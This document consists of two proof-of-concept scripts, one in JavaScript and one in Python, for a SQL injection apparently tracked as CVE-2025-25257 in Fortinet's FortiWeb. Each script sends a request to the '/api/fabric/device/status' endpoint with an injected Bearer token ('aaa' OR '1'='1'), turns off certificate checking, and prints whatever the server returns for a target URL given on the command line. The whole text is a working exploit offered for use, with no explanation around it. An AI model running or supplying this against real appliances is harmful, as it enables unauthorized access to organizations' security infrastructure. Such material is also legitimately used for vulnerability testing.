File: java/poc.js
const axios = require('axios');

async function testSQLi(baseUrl) {
    const url = `${baseUrl}/api/fabric/device/status`;
    try {
        const response = await axios.get(url, {
            headers: {
                'Authorization': "Bearer aaa' OR '1'='1"
            },
            httpsAgent: new (require('https').Agent)({ rejectUnauthorized: false }),
            timeout: 10000
        });
        console.log(`Status code: ${response.status}`);
        console.log("Response body:");
        console.log(response.data);
    } catch (err) {
        console.error(`Error: ${err.message}`);
    }
}

if (require.main === module) {
    const baseUrl = process.argv[2];
    if (!baseUrl) {
        console.error("Usage: node poc.js <base_url>");
        process.exit(1);
    }
    testSQLi(baseUrl);
}

File: src/poc.py
import requests

def test_sqli(base_url):
    url = f"{base_url}/api/fabric/device/status"
    headers = {
        "Authorization": "Bearer aaa' OR '1'='1"
    }
    try:
        response = requests.get(url, headers=headers, verify=False, timeout=10)
        print(f"Status code: {response.status_code}")
        print("Response body:")
        print(response.text)
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    import argparse
    parser = argparse.ArgumentParser(description="PoC SQLi CVE-2025-25257 FortiWeb")
    parser.add_argument("base_url", help="Base URL of FortiWeb (ex: https://10.0.0.5)")
    args = parser.parse_args()
    test_sqli(args.base_url)
